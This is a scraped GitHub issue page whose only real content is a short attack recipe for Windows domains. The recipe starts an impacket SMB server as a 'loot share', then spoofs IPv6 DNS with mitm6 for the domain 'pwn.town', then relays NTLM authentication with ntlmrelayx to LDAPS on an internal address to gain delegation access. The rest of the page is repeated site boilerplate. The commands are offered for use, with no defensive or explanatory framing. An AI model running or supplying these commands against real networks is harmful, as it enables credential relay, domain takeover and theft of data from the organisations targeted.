We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Spin up a loot share
smbserver.py share2 /share -smb2support
Kick things off with mitm6
sudo python3 /opt/mitm6/mitm6/mitm6.py -i eth0 -d pwn.town --no-ra --ignore-nofqdn
Get the relay going:
sudo python3 /opt/impacket/examples/ntlmrelayx.py -6 -wh doesntexist -t ldaps://10.0.7.100 -smb2support --delegate-access
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Spin up a loot share
Kick things off with mitm6
Get the relay going:
The text was updated successfully, but these errors were encountered: